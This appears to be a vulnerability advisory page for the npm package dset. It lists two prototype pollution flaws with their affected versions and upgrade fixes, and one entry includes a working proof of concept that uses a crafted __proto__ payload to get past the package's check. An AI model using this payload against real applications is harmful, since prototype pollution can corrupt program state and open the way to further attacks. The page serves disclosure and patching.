Vulnerability	Vulnerable Version
H Prototype Pollution dset is an A tiny (161B) utility for safely writing deep Object values~! Affected versions of this package are vulnerable to Prototype Pollution via the `dset` function due improper user input sanitization. This vulnerability allows the attacker to inject malicious object property using the built-in Object property `__proto__`, which is recursively assigned to all the objects in the program. How to fix Prototype Pollution? Upgrade `dset` to version 3.1.4 or higher.	<3.1.4
M Prototype Pollution dset is an A tiny (161B) utility for safely writing deep Object values~! Affected versions of this package are vulnerable to Prototype Pollution via 'dset/merge' mode, as the `dset` function checks for prototype pollution by validating if the top-level path contains `__proto__`, `constructor` or `protorype`. By crafting a malicious object, it is possible to bypass this check and achieve prototype pollution. PoC: `// poc.js contains: const {dset} = require("dset/merge") var a = {b:{c:1}} console.log("a.polluted:",a.polluted) console.log("{}.polluted:",({}).polluted) dset(a,"b", JSON.parse('{"__proto__":{"polluted":"Yes!"}}') ) //Needs to craft payload with JSON.parse to keep the object key __proto__ console.log("a.polluted:",a.polluted) console.log("{}.polluted:",({}).polluted) // Running node poc.js give the output: a.polluted: undefined {}.polluted: undefined a.polluted: Yes! {}.polluted: Yes!` How to fix Prototype Pollution? Upgrade `dset` to version 3.1.2 or higher.	<3.1.2

Prototype Pollution

dset is an A tiny (161B) utility for safely writing deep Object values~!

Affected versions of this package are vulnerable to Prototype Pollution via the dset function due improper user input sanitization. This vulnerability allows the attacker to inject malicious object property using the built-in Object property __proto__, which is recursively assigned to all the objects in the program.

How to fix Prototype Pollution?

Upgrade dset to version 3.1.4 or higher.

<3.1.4

Prototype Pollution

dset is an A tiny (161B) utility for safely writing deep Object values~!

Affected versions of this package are vulnerable to Prototype Pollution via 'dset/merge' mode, as the dset function checks for prototype pollution by validating if the top-level path contains __proto__, constructor or protorype. By crafting a malicious object, it is possible to bypass this check and achieve prototype pollution.

PoC:

// poc.js contains:

const {dset} = require("dset/merge")

var a = {b:{c:1}}

console.log("a.polluted:",a.polluted)
console.log("{}.polluted:",({}).polluted)

dset(a,"b", JSON.parse('{"__proto__":{"polluted":"Yes!"}}') ) //Needs to craft payload with JSON.parse to keep the object key __proto__

console.log("a.polluted:",a.polluted)
console.log("{}.polluted:",({}).polluted)

// Running node poc.js give the output:

a.polluted: undefined
{}.polluted: undefined
a.polluted: Yes!
{}.polluted: Yes!

How to fix Prototype Pollution?

Upgrade dset to version 3.1.2 or higher.

<3.1.2

Go back to all versions of this package